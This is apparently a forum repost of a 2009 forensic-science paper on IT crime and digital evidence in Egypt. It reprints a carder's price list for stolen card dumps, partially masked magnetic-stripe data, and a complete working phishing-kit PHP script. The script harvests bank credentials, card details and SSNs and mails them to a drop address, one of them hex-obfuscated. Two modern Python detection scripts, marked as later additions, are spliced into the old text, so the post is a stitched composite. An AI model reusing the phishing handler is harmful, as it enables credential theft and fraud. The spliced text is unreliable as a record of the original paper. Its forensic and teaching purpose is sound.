


لارين
07-27-2009, 10:23 AM
IT-Crimes and digital evidence investigation

By:

Ahmed Mohamed Walid

Department of counterfeiting and forgery Researches

Medico-Legal Administration, Ministry of Justice

AhmedMWalid@hotmail.com
Table of Contents





List of Figures
Abstract
Introduction
Part I: IT-Crime
1.1 Definitions
1.2 Common types of computer crime
1.2.1 Fraud by computer manipulation
1.2.2 Computer forgery
1.2.3 Damage to or modifications of computer data or programs
1.2.4 Unauthorized access to computer systems and service
1.2.5 Unauthorized reproduction of legally protected computer programs
1.3 E-Crime in Egypt
1.3.1 First Case (forgery)
1.3.2 Second case (currency counterfeiting)
1.3.3 Third case (Credit card fraud 'Skimming')
1.3.4 Fourth case (Phishing)
Part II: Digital Evidence and Computer Crime
2.1 Definitions
2.2 Types of digital evidence
2.3 The Need for Standardization
2.4 Standards
2.5 Investigative Tools
2.5.1 Overview
2.5.2 Examples of hardware tools
2.5.2.1 Forensic system
2.5.2.2 RoadMASSter-3
2.5.2.3 HardCopy II Drive Imaging System
2.5.2.4 ImageMASSter 6007SAS
2.5.3 Examples of software tools
2.5.3.1 EnCase® Software
2.5.3.2 The Forensic ToolKit
2.5.3.3 Decode - Forensic Date/Time Decoder
Part III: Standard model for digital evidence investigation in Egypt
3.1 Qualified persons
3.2 Appropriate tools
3.3 Methodology
References
Arabic Summary

List of Figures


Figure 1.1: Number of Internet subscribers
Figure 1.2: The forged document
Figure 1.3: Different types of currencies
Figure 1.4: Different types of Egyptian currencies prepared for counterfeiting
Figure 1.5: Egyptian currencies
Figure 1.6: U.S.A currency
Figure 1.7: Libyan currency
Figure 1.8: Credit card writer & cards
Figure 1.9: Skimmer
Figure 1.10: Screenshot for an offer mail of credit cards details
Figure 1.11: An offer mail of credit cards details
Figure 1.12: Sample of credit card details
Figure 1.13: Phishing sites by country of host
Figure 1.14: Screenshot for a phishing site part 1
Figure 1.15: Screenshot for a phishing site part 2
Figure 1.16: A script used in phishing processes
Figure 2.1: Forensic system
Figure 2.2: RoadMASSter-3
Figure 2.3: HardCopy II Drive Imaging System
Figure 2.4: ImageMASSter 6007SAS
Figure 2.5: EnCase® Software
Figure 2.6: The Forensic ToolKit
Figure 2.7: Screenshot for Forensic Toolkit
Figure 2.8: Screenshot for Decode - Forensic Date/Time Decoder






Abstract


With the spread of computers and the Internet, the use of these technologies in crime is increasing rapidly: sometimes the computer is a tool for a traditional crime, and sometimes it enables a new type of crime. In both cases this is defined as IT-Crime (Information Technology Crime). IT-Crime can be viewed from different angles, such as law, social studies and computer science.
This paper discusses IT-crime from the forensic science perspective. It defines IT-crime and its common types, gives examples of actual IT-crime cases in Egypt, and then turns to the core of the subject from the forensic point of view: evidence and investigation.
The paper explains the definition of digital evidence, its types, the need for standardization, the global effort in this field, the evolution of investigation processes and examples of investigation tools.
Finally, it gives a framework for establishing a standard model for the digital evidence investigation process in Egypt.
Introduction



The Internet, computer networks, and automated data systems present an enormous new opportunity for committing criminal activity. Computers and other electronic devices are increasingly being used to commit, enable, or support crimes perpetrated against persons, organizations, or property. Whether the crime involves attacks against computer systems, the information they contain, or more traditional crimes such as murder, money laundering, or fraud, electronic evidence is increasingly involved. It is no surprise that law enforcement and criminal justice officials are being overwhelmed by the volume of investigations and prosecutions that involve electronic evidence (1).
IT-Crime is a new field combining more than one area: law, computer science and sociology. A jurist examines the phenomenon from the perspective of whether existing legislation is adequate to deal with it; a computer specialist examines it from the perspective of the programs and code used in it; a sociologist examines it from the perspective of its effect on the community.
In this paper we study this phenomenon from the forensic computer science point of view. The paper is divided into three parts. Part I begins with the definition of IT-Crime and its common types according to the United Nations Manual on the prevention and control of computer-related crime, then covers IT-Crime in Egypt and real cases of it. Part II deals with digital evidence and computer crime: its types, the need for standardization, the standards of the Scientific Working Group on Digital Evidence (SWGDE) and the International Organization on Computer Evidence (IOCE), investigative tools and their development, and examples of hardware and software investigation tools. Part III gives our recommendations for establishing a standard model for digital evidence investigation in Egypt.
Part I

IT-Crime



1.1 Definitions:


There is no standard definition of e-crime. People use different terms with different meanings – cyber crime, hi-tech crime, computer crime, Internet crime, IT crime.

It is simply any criminal activity where a computer or network is the tool, target, or place of a crime. These categories are not exclusive and many activities can be characterized as falling in one or more category. Additionally, although the terms computer crime or cyber crime are more properly restricted to describing criminal activity in which the computer or network is a necessary part of the crime, these terms are also sometimes used to include traditional crimes, such as fraud, theft, blackmail, forgery, and embezzlement, in which computers or networks are used to facilitate the illicit activity (2).

1.2 Common types of computer crime:


(According to the United Nations Manual on the prevention and control of computer-related crime (3))


All stages of computer operations are susceptible to criminal activity, either as the target of the crime or the instrument of the crime or both. Input operations, data processing, output operations and communications have all been utilized for illicit purposes. The more common types of computer-related crime are categorized next:



1.2.1 Fraud by computer manipulation:

Intangible assets represented in data format, such as money on deposit or hours of work, are the most common targets of computer-related fraud. Modern business is quickly replacing cash with deposits transacted on computer systems, creating an enormous potential for computer abuse. Credit card information, as well as personal and financial information on credit-card clients, has been frequently targeted by the organized criminal community. The sale of this information to counterfeiters of credit cards and travel documents has proven to be extremely lucrative. Assets represented in data format often have a considerably higher value than traditionally targeted economic assets, resulting in potentially greater economic loss. In addition, improved remote access to databases allows the criminal the opportunity to commit various types of fraud without ever physically entering the premises of the victim.

Computer fraud by input manipulation is the most common computer crime, as it is easily perpetrated and difficult to detect. Often referred to as "data diddling", it does not require any sophisticated computer knowledge and can be committed by anyone having access to normal data-processing functions at the input stage.

Program manipulation, which is very difficult to discover and is frequently not recognized, requires the perpetrator to have computer-specific knowledge. It involves changing existing programs in the computer system or inserting new programs or routines. A common method used by persons with specialized knowledge of computer programming is the Trojan horse, whereby computer instructions are covertly placed in a computer program so that it will perform an unauthorized function concurrent with its normal function. A Trojan horse can be programmed to self-destruct, leaving no evidence of its existence except the damage that it caused. Remote access capabilities today also allow the criminal to easily run modified routines concurrently with legitimate programs.

Output manipulation is effected by targeting the output of the computer system. The obvious example is cash dispenser fraud, achieved by falsifying instructions to the computer in the input stage. Traditionally, such fraud involved the use of stolen bank cards. However, specialized computer hardware and software is now being widely used to encode falsified electronic information on the magnetic strips of bank cards and credit cards.
1.2.2 Computer forgery:

Where data are altered in respect of documents stored in computerized form, the crime is forgery. In this and the above examples, computer systems are the target of criminal activity. Computers, however, can also be used as instruments with which to commit forgery. They have created a new library of tools with which to forge the documents used in commerce. A new generation of fraudulent alteration or counterfeiting emerged when computerized color laser copiers became available. These copiers are capable of high-resolution copying, the modification of documents and even the creation of false documents without benefit of an original, and they produce documents whose quality is indistinguishable from that of authentic documents except by an expert.



1.2.3 Damage to or modifications of computer data or programs:

This category of criminal activity involves either direct or covert unauthorized access to a computer system by the introduction of new programs known as viruses, "worms" or logic bombs. The unauthorized modification, suppression or erasure of computer data or functions with the intent to hinder normal functioning of the system is clearly criminal activity and is commonly referred to as computer sabotage. Computer sabotage can be the vehicle for gaining economic advantage over a competitor, for promoting the illegal activities of ideologically motivated terrorists or for stealing data or programs (also referred to as "bitnapping") for extortion purposes. In one reported incident at London, Ontario, in 1987, a former employee of a company sought unsuccessfully to sabotage the computer system of the company by inserting a program into the system that would have wiped it out completely.
A virus is a series of program codes that has the ability to attach itself to legitimate programs and propagate itself to other computer programs. A virus can be introduced to a system by a legitimate piece of software that has been infected, as well as by the Trojan horse method discussed above.
The potential purposes of viruses are many, ranging from the display of harmless messages on several computer terminals to the irreversible destruction of all data on a computer system. In 1990, Europe first experienced a computer virus, used to commit extortion in the medical research community. The virus threatened to destroy increasing amounts of data if no ransom was paid for the "cure". A significant amount of valuable medical research data was lost as a result.
A worm is similarly constructed to infiltrate legitimate data-processing programs and to alter or destroy the data, but it differs from a virus in that it does not have the ability to replicate itself. In a medical analogy, the worm can be compared to a benign tumor, the virus to a malignant one. However, the consequences of a worm attack can be just as serious as those of a virus attack: for example, a bank computer can be instructed, by a worm program that subsequently destroys itself, to continually transfer money to an illicit account.
A logic bomb, also known as a "time bomb", is another technique by which computer sabotage can be perpetrated. The creation of logic bombs requires some specialized knowledge, as it involves programming the destruction or modification of data at a specific time in the future. Unlike viruses or worms, however, logic bombs are very difficult to detect before they blow up; thus, of all these computer crime schemes, they have the greatest potential for damage. Detonation can be timed to cause maximum damage and to take place long after the departure of the perpetrator. The logic bomb may also be used as a tool of extortion, with a ransom being demanded in exchange for disclosure of the location of the bomb.
Irrespective of motive, the fact remains that the use of viruses, worms and logic bombs constitutes unauthorized modification of legitimate computer data or programs and thus falls under the rubric of computer sabotage, although the motive of the sabotage may be circumstantial to the alteration of the data.

1.2.4 Unauthorized access to computer systems and service:
The desire to gain unauthorized access to computer systems can be prompted by several motives, from simple curiosity, as exemplified by many hackers, to computer sabotage or espionage. Intentional and unjustified access by a person not authorized by the owners or operators of a system may often constitute criminal behavior. Unauthorized access creates the opportunity to cause additional unintended damage to data, system crashes or impediments to legitimate system users by negligence.
Access is often accomplished from a remote location along a telecommunication network, by one of several means. The perpetrator may be able to take advantage of lax security measures to gain access or may find loopholes in existing security measures or system procedures. Frequently, hackers impersonate legitimate system users; this is especially common in systems where users can employ common passwords or maintenance passwords found in the system itself.
Password protection is often mischaracterized as a protective device against unauthorized access. However, the modern hacker can easily circumvent this protection using one of three common methods. If a hacker is able to discover a password allowing access, then a Trojan horse program can be placed to capture the other passwords of legitimate users. This type of program can operate concurrently with the normal security function and is difficult to detect. The hacker can later retrieve the program containing the stolen passwords by remote access.
Password protection can also be bypassed successfully by utilizing password cracking routines. Most modern software effects password security by a process that converts a user's selected password into a mathematical series, a process known as encryption. Encryption disguises the actual password, which is then almost impossible to decrypt. Furthermore, legitimate security software has been developed that allows access to data only after it checks encrypted passwords against a dictionary of common passwords so as to alert system administrators of potential weakness in security. However, this same security process can be imitated for illegitimate purposes. Known as a "cracker" program when used for illegitimate purposes, these tools encrypt some or all of the data of the system. This creates a dictionary of data to compare with cracker software, for the purpose of identifying common passwords and gaining access to the system. A variety of these system-specific encryption routines can be obtained from hacker bulletin boards around the world and are regularly updated by the criminal community as security technology develops.
The third method commonly used to access a system is the "trapdoor" method, whereby unauthorized access is achieved through access points, or trapdoors, created for legitimate purposes, such as maintenance of the system.
The international criminal hacker community uses electronic bulletin boards to communicate system infiltration incidents and methods. In one case, details of a Canadian attempt to access a system were found on suspects in an unrelated matter in England; they had removed the material from a bulletin board in Germany. This sharing of information can facilitate multiple unauthorized infiltrations of a system from around the globe, resulting in staggering telecommunication charges to the victim.
With the development of modern telecommunications system, a new field for unauthorized infiltration was created. Personal telecommunications have been expanded with the advent of portable, cellular telecommunication devices. The criminal community has responded to these advances by duplicating the microchip technology.
Modern telecommunications systems are equally vulnerable to criminal activity. Office automation systems such as voice mail boxes and private business exchanges are, in effect, computer systems, designed for the convenience of users. However, convenience features such as remote access and maintenance capabilities, call-forwarding and voice-messaging are easily infiltrated by computer criminals.
Modern telecommunications systems, like other computer systems, are also susceptible to abuse by remote access. The integration of telecommunications systems means that once one system is accessed, a computer operator with sufficient skill could infiltrate the entire telecommunications network of a city. The usual motive for telecommunications crime is to obtain free telecommunications services. However, more innovative telecommunications fraud has also been uncovered, and telecommunications systems have been used to disguise other forms of criminal activity.

1.2.5 Unauthorized reproduction of legally protected computer programs:
The unauthorized reproduction of computer programs can mean a substantial economic loss to the legitimate owners. Several jurisdictions have dictated that this type of activity should be the subject of criminal sanction. The problem has reached transnational dimensions with the trafficking of these unauthorized reproductions over modern telecommunication networks.

1.3 E-Crime in Egypt:

The question is: where does Egypt stand with respect to this phenomenon?
As the number of computer and Internet users has increased in the last few years, e-crime has increased as well.



Figure 1.1: Number of Internet subscribers (4)
The number of Internet subscribers was 5,200,000 as of 30/06/2006.



The use of computers in criminal activity began as an aid in traditional crimes such as document forgery and currency counterfeiting; the other types of e-crime came later.
In this paper we give four real cases of e-crime in Egypt:
1.3.1 First Case (forgery):
This is an example of the use of the computer as an aid in a traditional crime. In this case the forger used a scanner to capture the signature and the fingerprint of the victim from a genuine document and then printed them onto another document with a color printer.

Figure 1.2: The forged document

1.3.2 Second case (currency counterfeiting):

This is another case of the use of the computer in a traditional crime. Currency counterfeiting is the most fundamental financial crime (http://www.interpol.int/Public/FinancialCrime/Default.asp); the production of counterfeit currency recognizes no national boundaries. In Egypt we see counterfeit Egyptian pounds, dollars, euros, Arab currencies and others.
In the last few years currency counterfeiting has increased because of the growing number of computer users and the falling price and rising quality of scanners and color printers.

Figure 1.3: Different types of currencies

Figure 1.4: Different types of Egyptian currencies prepared for counterfeiting

Figure 1.5: Egyptian currencies

Figure 1.6: U.S.A currency

Figure 1.7: Libyan currency

1.3.3 Third case (Credit card fraud 'Skimming'):

Skimming is the theft of credit card information by a dishonest employee of a legitimate merchant, either by manually copying down the numbers or by using a magnetic stripe reader on a pocket-sized electronic device. Common scenarios for skimming are restaurants or bars, where the skimmer has possession of the victim's credit card out of the victim's immediate view. The skimmer will typically use a small keypad to unobtrusively transcribe the 3- or 4-digit card security code, which is not present on the magnetic strip. Many instances of skimming have been reported where the perpetrator has put a device over the card slot of a public cash machine (automated teller machine), which reads the magnetic strip as the user unknowingly passes their card through it. These devices are often used in conjunction with a pinhole camera to read the user's PIN at the same time.
The cost of credit card fraud reaches into billions of dollars annually. In 2006, fraud in the United Kingdom alone was estimated at £428.0 million (about $700-800 million) (5).

Figure 1.8: Credit card writer & cards

Figure 1.9: Skimmer: a tiny device that reads your credit card number and delivers it to bad guys (6)

Figure 1.10: Screenshot for an offer mail of credit cards details

>Subject: Skimmed d umps from Hotel DB. News and prices>Date: Mon, 8 Jan 2007 07:55:13 -0800 (PST)> >Hello, i am luxmarket and i am selling dumps since>times of carderplanet. Without excess modesty i want>to say that i am one of the biggest dumps vendor for>the moment.> >On 10/12/2006 brand new, virgin EU DB were released. A>lot of high quality, RARE, high limit EU dumps.> > > Here is my offer for dumps:> >US Dumps> US Mix>(20Gold/20Plats/20Biz&Corp/40MCstandart&calssic), bin>on my choose - $10/one in the count you taking 100+>(e.g. 100 dumps - $1000)> US Classic - $15, Debit Classic - $15> >US MC Standart – $18> > US Gold - $18> US Platinum - $30> US Purchasing/Signature - $40> US Bussines/Corporate - $40> US MC World - $50> >EU dumps> EU Italy Classic - $200> EU Italy Gold - $230> EU Italy Platinum - $300> EU Italy Bussines - $310> EU Spain/Switzerland/Turkey/Greece etc Classic - $120> EU Spain/Switzerland/Turkey/Greece etc Gold - $180> EU Spain/Switzerland/Turkey/Greece etc Platinum ->$180> EU Spain/Switzerland/Turkey/Greece etc Bussines ->$300> EU Germany/UK Classic - $180> EU Germany/UK Gold - $200> > EU Germany/UK Platinum - $180> EU Germany/UK Bussines - $180> EU Other MC standart - $185> EU Other Gold - $180> EU Other Platinum - $185> EU Other Bussines/Corporate - $185> EU Infinite - $1200> EU Amex Black - $1200> EU Dinners - $120> >Arab-countries dumps> Arab Visa Classic - $300> Arab Visa Gold - $300> Arab Visa Platinum - $420> Arab Business/Corporate - $420> Arab Infinite - $1600> Arab Amex - $120> Arab Dinners - $100> >Chipped (201) dumps

>Why the price for EU is too high?>-The price is high because the quality of the goods>are high. High quality costs big money. Let me show>you an example: someone driving BMW nd somebody can>drive Fiat or Seat or something cheap, when you>driving in bmw you feel comfort and freely, but for>this comfort you have to pay money, otherwise - you>drive seat and there is no such comfort and safety ->but less price, you can buy used car at all and crash>it in incedent ;-) . The same story with the dumps,>you can buy cheap dumps from cheap vendor, or from the>ripper at all and you risking to be ripped, or even>worse you can get dumps from old base which is under>control or in warn list and got caught. Choice is>after you... But here is my last word: for the moment>i writing those words the validity of the dumps is on>top (about 90%) and even classics working about 2k>EUR, you really paying for serious stuff you not seen>before. Once again: choice after you...> >What is the minimal sum of the deal with you?>-There is no minimal order - minimal order is one>dump.> >What is the minimal sum of the deal with you if I pay>via E-gold?>-There is no minimal order - minimal order is one>dump.> >What is the format of your dumps?>-My dumps are in the 1-st and 2-nd track format.> >Do you sell the dumps with the original first track?>-Yes.> >How fast can I receive the dumps after the supplying>the info about Western union payment?>-Usally same time as i receiving money. For WU - you>getting the order once my drop picks the funds up.>Sometimes delivery time can be raised up to 24h (very>rare case)> >Do you allow the discounts for great orders?>-Yes, sure. 
Also i provide amazing discounts for a>long-term custommers and just if i am in good mood.> >After I've sent you Western union order, what info>should I let you know of?>-The name and the surname of the sender, MTCN>(10-digit code), amount, city, state and country.> >Do you replace the dumps if during the use I've>received DECLINE, PICK UP, unsufficient funds, call>for authorization etc.?>-No, I don't make any replacements, cause I check all>the dumps before the selling on the good checking>service, which doesn't kill dumps as rapidly as the>other ones. But in some cases i can investigate why>this happened.> >Will your US dumps work in the Europe?>-I don't recommend to buy the dumps for the Europe,>cause some dumps work there, but some - don't work and>I do not offer any guarantee.> >Do you sell your dumps on credit?>-No, I don't, cause the credit spoils the>relationship.> >I am want to buy, but i am affraid to be ripped. What>to do?>-Yes, we understanding you - there is very lot of>rippers over the internet for the moment. Because this>we offer you not to order a bulk for a first time ->you can order 1-2pcs for test and later proceed to>bigger ammounts, so we will know better each other.> >May i have one or two dumps for test?>Yes. You can BUY one or two dumps for test - there is>no minimum.>WE NOT PROVIDING ANY FREE DUMPS.THOSE WHO PROCEED TO>ANNOY AFTER FIRST WARNING IN ICQ WILL IMMEDIATELLY>WILL BE ADDED TO IGNORE LIST.>NO MONEY - NO HONEY.> >I not know what BIN to order. Can you help me?>-Yes, if i know what is good in your region and i have>it in my stock - i will provide you with the pleasure.

Figure 1.11: An offer mail of credit cards details

B5490??????????14248^FU /PABLO ^06111010000004100???????00000
5490????????????14248=0611??????00004100000
MBNA platinum

B51488?????????998^WELNA /MICHAEL R ^070510100????????000000000
51488??????????998=070510100??????7000000








Figure 1.12: Sample of credit card details
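The fragments in Figure 1.12 follow the magnetic-stripe layout of ISO/IEC 7813: track 1 is `%B<PAN>^<NAME>^<YYMM><service code>...?` and track 2 is `;<PAN>=<YYMM><service code>...?`. The following Python example is added here and is not part of the original paper or of any tool it describes. It shows how an examiner, or a data-loss-prevention filter on a mail gateway, can recognise such material in seized mail or files: it parses both track formats, drops candidates whose account number fails the Luhn checksum, and keeps only a masked PAN in the report. The sample text is constructed; the account number is the public Visa test number 4111111111111111 and the cardholder names are invented.

```python
import re

# Constructed sample resembling a "dumps" message. The PAN is the public Visa test
# number 4111111111111111 (not a live account) and the cardholder names are invented.
# The third line is a decoy whose PAN fails the Luhn check and must be ignored.
SAMPLE_TEXT = (
    "%B4111111111111111^DOE/JANE ^25121010000000000000?\n"
    ";4111111111111111=25121010000000000000?\n"
    "%B4111111111111112^DECOY/NOT ^25121010000000000000?\n"
    "Order ref 12345678 - contact us for more.\n"
)

# Track 1, format B: %B<PAN>^<name>^<YY><MM><service code><discretionary data>?
TRACK1_RE = re.compile(r"%?B(\d{13,19})\^([^^\n]{2,26})\^(\d{2})(\d{2})(\d{3})[^?\n]*\??")
# Track 2: ;<PAN>=<YY><MM><service code><discretionary data>?
TRACK2_RE = re.compile(r";?(\d{13,19})=(\d{2})(\d{2})(\d{3})[^?\n]*\??")


def luhn_valid(pan: str) -> bool:
    """Luhn (mod 10) checksum used on payment card numbers (ISO/IEC 7812)."""
    total = 0
    for position, ch in enumerate(reversed(pan)):
        digit = int(ch)
        if position % 2 == 1:          # every second digit from the right is doubled
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep the issuer prefix (6 digits) and the last four; a report needs no more."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track_data(text: str) -> list:
    """Return one record per Luhn-valid track 1 or track 2 fragment found in text."""
    hits = []
    for m in TRACK1_RE.finditer(text):
        pan, name, yy, mm, service = m.groups()
        if luhn_valid(pan):
            hits.append({"track": 1, "pan": mask_pan(pan), "name": name.strip(),
                         "expiry": f"20{yy}-{mm}", "service_code": service})
    for m in TRACK2_RE.finditer(text):
        pan, yy, mm, service = m.groups()
        if luhn_valid(pan):
            hits.append({"track": 2, "pan": mask_pan(pan), "name": None,
                         "expiry": f"20{yy}-{mm}", "service_code": service})
    return hits


if __name__ == "__main__":
    for hit in find_track_data(SAMPLE_TEXT):
        print(hit)
```

The Luhn check is what keeps the detector quiet on order numbers and other digit runs; the masked PAN and the expiry are enough to match a hit against a bank's own records without copying the full account number into the case file. The redacted fragments in Figure 1.12 themselves would not match, because their digits have been replaced with question marks.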






1.3.4 Fourth case (Phishing):

Phishing is the act of sending an e-mail (http://www.webopedia.com/TERM/P/e_mail.html) to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. The e-mail directs the user to visit a Web site (http://www.webopedia.com/TERM/P/Web_site.html) where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information (7).

Figure 1.13: Phishing sites by country of host (8)

Figure 1.14: Screenshot for a phishing site part 1

Figure 1.15: Screenshot for a phishing site part 2

<?php
$COOKIE_VAR="616c6c616e64736d6969746840696e626f782e636f6d";
//USER ACCOUNT

$account_state = $_POST['account_state'];
$online_id = $_POST['online_id'];
$pin = $_POST['pin'];
$passcode = $_POST['passcode'];
$repasscode = $_POST['repasscode'];
$email = $_POST['email'];

//BILLING ADDRESS

$cardname = $_POST['cardname'];
$address1 = $_POST['address1'];
$address2 = $_POST['address2'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['zip'];
$phone = $_POST['phone'];

//ACCOUNT INFORMATION

$ccnumber= $_POST['ccnumber'];
$mexpcc = $_POST['mexpcc'];
$yexpcc = $_POST['yexpcc'];
$cvv = $_POST['cvv'];
$ban = $_POST['ban'];
$brn = $_POST['brn'];

//SECURITY QUESTION

$mmn = $_POST['mmn'];
$ssn = $_POST['ssn'];
$dob = $_POST['dob'];
$dln = $_POST['dln'];

$msg = "--------------------------------------
Account open in : $account_state\nOnline ID : $online_id\nPasscode : $passcode\nATM PIN : $pin\nEmail : $email
--------------------------------------
Card Holder Name : $cardname\nAddress1 : $address1\nAddress2 : $address2\nCity : $city\nState : $state\nZipcode : $zip\nPhone : $phone
----------------------------------------
Credit Card Number : $ccnumber\nExpiration Date : $mexpcc-$yexpcc\nCVV2 : $cvv\nSiteKey Question 1 : $ban\nSiteKey Question 2 : $brn
----------------------------------------
SiteKey Answer 1 : $mmn\nSiteKey Answer 2 : $ssn\nMMN : $dln\nSSN : $dob
----------------------------------------\n";


$to="???????@yahoo.com";


$message="";
for ($j=0; $j<strlen($COOKIE_VAR);$j=$j+2)
{
$message.=chr(hexdec($COOKIE_VAR[$j].$COOKIE_VAR[$j+1]));
}

$subj = "$ccnumber - nEwBOA";
$from = "Kids@BankOfAmerica.com";
$arr=array($to, $message);
foreach ($arr as $to)
{
mail ($to, $subj, $msg, $from);
}

header("Location: complete.htm");

?>




Figure 1.16: a script used in phishing processes
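When a kit like the one in Figure 1.16 is recovered from a compromised web server, the examiner's first questions are what the form collects, where the submissions are sent, what sender address is spoofed, and where the victim is redirected afterwards. The script hides one recipient address as a hex string (`$COOKIE_VAR`) and decodes it at run time, so a plain search for e-mail addresses misses it. The following Python example is added here and is not the paper's code; it performs that static triage on a constructed miniature of such a handler. All values in the sample (the hex string, the addresses, the redirect target) are placeholders invented for the example.

```python
import re

# Constructed miniature of a phishing-kit handler, shaped like the script in
# Figure 1.16 but with invented placeholder values; it is not the page's script.
# The hex string decodes to "analyst-placeholder@example.com".
SAMPLE_KIT = r'''<?php
$COOKIE_VAR="616e616c7973742d706c616365686f6c646572406578616d706c652e636f6d";
$online_id = $_POST['online_id'];
$ccnumber = $_POST['ccnumber'];
$pin = $_POST['pin'];
$to="drop-placeholder@example.net";
$message="";
for ($j=0; $j<strlen($COOKIE_VAR);$j=$j+2)
{
$message.=chr(hexdec($COOKIE_VAR[$j].$COOKIE_VAR[$j+1]));
}
$from = "Security@bank-placeholder.example";
mail ($to, "$ccnumber - new", $msg, $from);
header("Location: complete.htm");
?>'''

POST_FIELD_RE = re.compile(r"\$_POST\['([^']+)'\]")
HEX_STRING_RE = re.compile(r'"([0-9a-fA-F]{16,})"')          # long all-hex literals
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
REDIRECT_RE = re.compile(r'header\(\s*"Location:\s*([^"]+)"')


def decode_hex_strings(source: str) -> dict:
    """Decode double-quoted literals made only of hex pairs (the $COOKIE_VAR
    trick) into printable ASCII; anything that does not decode cleanly is skipped."""
    decoded = {}
    for literal in HEX_STRING_RE.findall(source):
        if len(literal) % 2:
            continue
        try:
            text = bytes.fromhex(literal).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            decoded[literal] = text
    return decoded


def triage_kit(source: str) -> dict:
    """Static triage: captured form fields, visible and hidden e-mail addresses,
    and the page the victim is sent to after submitting."""
    hidden = decode_hex_strings(source)
    visible_emails = set(EMAIL_RE.findall(source))
    hidden_emails = {value for value in hidden.values() if EMAIL_RE.fullmatch(value)}
    redirect = REDIRECT_RE.search(source)
    return {
        "posted_fields": POST_FIELD_RE.findall(source),
        "visible_emails": sorted(visible_emails),
        "hidden_emails": sorted(hidden_emails),
        "redirect": redirect.group(1) if redirect else None,
    }


if __name__ == "__main__":
    for key, value in triage_kit(SAMPLE_KIT).items():
        print(f"{key}: {value}")
```

The list of `$_POST` fields tells the investigator exactly which categories of personal data the victims surrendered, which matters for notification; the decoded address is the indicator most worth preserving, since it is the one the kit's author took care to hide. The same routine applied to the real script in Figure 1.16 decodes its `$COOKIE_VAR` in the same way.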
Part II

Digital Evidence and Computer Crime

Within the past few years a new class of crime scenes has become more prevalent, that is, crimes committed within electronic or digital domains, particularly within cyberspace. Criminal justice agencies throughout the world are being confronted with an increased need to investigate crimes perpetrated partially or entirely over the Internet or other electronic media. Resources and procedures are needed to effectively search for, locate, and preserve all types of electronic evidence. This evidence ranges from images of child pornography to encrypted data used to further a variety of criminal activities. Even in investigations that are not primarily electronic in nature, at some point in the investigation computer files or data may be discovered and further analysis required (9).


2.1 Definitions:

Digital evidence or electronic evidence is any probative information stored or transmitted in digital form that a party to a court case may use at trial (10).
The definition proposed by the Scientific Working Group on Digital Evidence (SWGDE) is any information of probative value that is either stored or transmitted in a digital form. Another definition proposed by the International Organization of Computer Evidence (IOCE) is information stored or transmitted in binary form that may be relied upon in court. However, these definitions focus too heavily on proof and neglect data that simply further an investigation. Additionally, the term binary in the latter definition is inexact, describing just one of many common representations of computerized data (11).

Types of digital evidence:

The use of digital evidence has increased in the past few decades as courts have allowed the use of e-mails, digital photographs, ATM transaction logs, word processing documents, instant message histories, files saved from accounting programs, spreadsheets, internet browser histories, databases, the contents of computer memory, computer backups, computer printouts, Global Positioning System tracks, logs from a hotel’s electronic door locks, and digital video or audio files (10).
In Egypt, Law No. 15/2004 allowed the use of digital evidence in court.
The terms digital evidence and electronic evidence are sometimes used interchangeably. However, an effort should be made to distinguish between electronic devices such as mobile telephones and the digital data that they contain. When considering the many sources of digital evidence, it is useful to categorize computer systems into three groups:
Open computer systems: Open computer systems are what most people think of as computers - systems comprised of hard drives, keyboards, and monitors such as laptops, desktops, and servers that obey standards. These systems, with their ever increasing amounts of storage space, can be rich sources of digital evidence. A simple file can contain incriminating information and can have associated properties that are useful in an investigation. For example, details such as when a file was created, who created it, or that it was created on another computer can all be important.
Communication systems: Traditional telephone systems, wireless telecommunication systems, the Internet, and networks in general can be a source of digital evidence. For instance, the Internet carries e-mail messages around the world. The time a message was sent, who sent it, or what the message contained can all be important in an investigation. To verify when a message was sent, it may be necessary to examine log files from intermediate servers and routers that handled a given message. To verify the contents of a message, it may be necessary to eavesdrop on the communication as it occurs.
Embedded computer systems: Mobile telephones, personal digital assistants, smart cards, and many other systems with embedded computers may contain digital evidence. For example, navigation systems can be used to determine where a vehicle has been and Sensing and Diagnostic Modules in many vehicles hold data that can be useful for understanding accidents, including the vehicle speed, brake status, and throttle position during the last five seconds before impact. Microwave ovens are now available with embedded computers that can download information from the Internet and some home appliances allow users to program them remotely via a wireless network or the Internet. In an arson investigation, data recovered from a microwave can indicate that it was programmed to trigger a fire at a specific time (11).
2.2 The Need for Standardization:
In 1994, the O.J. Simpson trial exposed many of the weaknesses of criminal investigation and forensic science. The investigation was hampered from the start with incomplete evidence collection, documentation and preservation at the crime scenes. Arguably, as a result of these initial errors, experienced forensic scientists were confused by and incorrectly interpreted important exhibits, introducing sufficient doubt for the jurors. The controversy surrounding this case made it clear that investigators and forensic scientists were not as reliable as was previously believed, undermining not just their credibility but also that of their profession. This crisis motivated many crime laboratories and investigative agencies to revise their procedures, improve training, and make other changes to avoid similar problems in the future. More recently, flaws have been found in the fingerprint and DNA analysis performed by some crime laboratories, calling many convictions into question and creating doubts about the analytical techniques themselves.
A similar crisis is looming in the area of digital evidence. The lack of generally required standards of practice and training allows weaknesses to persist, resulting in incomplete evidence collection, documentation and preservation as well as errors in analysis and interpretation of digital evidence. Innocent individuals may be in jail as a result of improper digital evidence handling and interpretation, allowing the guilty to remain free. Failures to collect digital evidence have undermined investigations, preventing the apprehension or prosecution of offenders and wasting valuable resources on cases abandoned due to faulty evidence. If this situation is not corrected, the field will not develop to its full potential, justice will not be served, and we risk a crisis that could discredit the field. The only reason we have not already encountered such a crisis is that our mistakes have been masked by obscurity. As more cases become reliant on digital evidence and more attention is focused on it, we must take steps to establish standards of practice and compel practitioners to conform to them.
